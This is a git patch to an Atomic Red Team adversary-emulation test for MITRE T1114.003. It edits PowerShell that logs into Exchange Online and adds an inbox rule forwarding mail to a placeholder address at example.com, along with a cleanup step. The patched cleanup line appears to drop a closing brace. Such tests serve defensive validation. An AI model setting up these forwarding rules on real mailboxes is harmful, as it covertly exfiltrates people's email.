From c09c0afbd9e0eb074cbbc95c0a4ae81a57e39d29 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld <tvjust@gmail.com>
Date: Wed, 4 Jan 2023 16:44:01 -0500
Subject: [PATCH] Update T1114.003.yaml

---
 atomics/T1114.003/T1114.003.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
index 7d70eb6f..d7294371 100644
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -9,11 +9,11 @@ atomic_tests:
   - office-365
   input_arguments:
     username:
-      description: office 365 username
+      description: office-365 username
       type: String
       default: null
     password:
-      description: office 365 password
+      description: office-365 password
       type: String
       default: null
     rule_name:
@@ -36,11 +36,11 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+      New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+      Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
     name: powershell
     elevation_required: false
\ No newline at end of file